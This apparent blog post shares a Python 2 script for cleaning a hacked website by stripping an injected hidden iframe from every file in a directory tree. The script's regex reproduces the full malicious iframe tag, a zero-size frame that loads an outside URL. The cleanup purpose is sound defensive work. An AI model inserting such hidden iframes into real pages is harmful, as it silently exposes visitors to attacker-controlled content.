Home arrow Tricks, Tips, and Help arrow Scripts and Tricks for Professionals arrow Find exploit and remove it with python regular expressions
Find exploit and remove it with python regular expressions Print E-mail
I had an explot hit a site that wasn't on one of my servers and there wasn't an backup availalbe to resore from. Still having to fix this I decided to write a script to inspect all the files and remove the bad text. Mostly the exploit appended an iframe at the end of files, but I wrote my script to remove particular text no matter where it sat in the file.

I wrote a bit about a python file structure crawler and I'll include my whole method below for reference.


#!/bin/env python
# By Josh White
#This script will start at the current directory and remove the expliot text
#from all of the files in all files and folders


import re
import os
myre = re.compile(r"""<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>""")
log = []
arglist = []
def check(arg,dirname,fnames):
      for file in fnames:
        arg.append(os.path.join(dirname,file))

os.path.walk("./",check, arglist)
for filename in arglist:
  print filename
  if os.path.isfile(filename):
    f = file(filename,"r").read()
    m = myre.search(f)
    if m:
        print "Expliot found in " + filename
        newfile = f[0:m.start()] +  f[m.end():len(f)]
        file(filename,"w").write(newfile)
        log.append(filename + " was repaired")

file("PYLOG.log","w").writelines(log)
 

Basically I compile the bad text as a regular expression, then iterate through every file and search for a match. If a match is found I replace the bad file with the file - bad text. I know this will only find the first instance of the bad text and remove it and if there were more instances in a single file they wouldn't be found. You could make the if myre.search into a recursive function, or just run the script multiple times!
 
 
< Prev   Next >
[ Back ]

Jibwa Work Samples

Under Construction

Jibwa.com is under construction. Watch out for broken links, missing pages, potholes and bulldozers. We apologize for the temporary inconvenience - Jibwa.com Staff

News and Updates

Doran Photographic Works

A local Tucson photographer was looking for the best way of displaying and selling his photography on the web. We ended up finding the best solution w...
Read More ...

Boyd Energy Site

A energy engineer wanted a place to share his knowledge of energy conservation and other building type technologies. Using Joomla 1.5 we have a site u...
Read More ...

Restart Cable Modem and Router

If you have a modem (Cable, DSL, T1, Other), and a router you are probably familiar with the power cycle! The power cycle is three simple steps and ...
Read More ...

Lecture Audio Clip Player

Mark Pirtle Website Russell Public was interested in having Mark's audio samples playable for visitors of the website. In order to do this we had to ...
Read More ...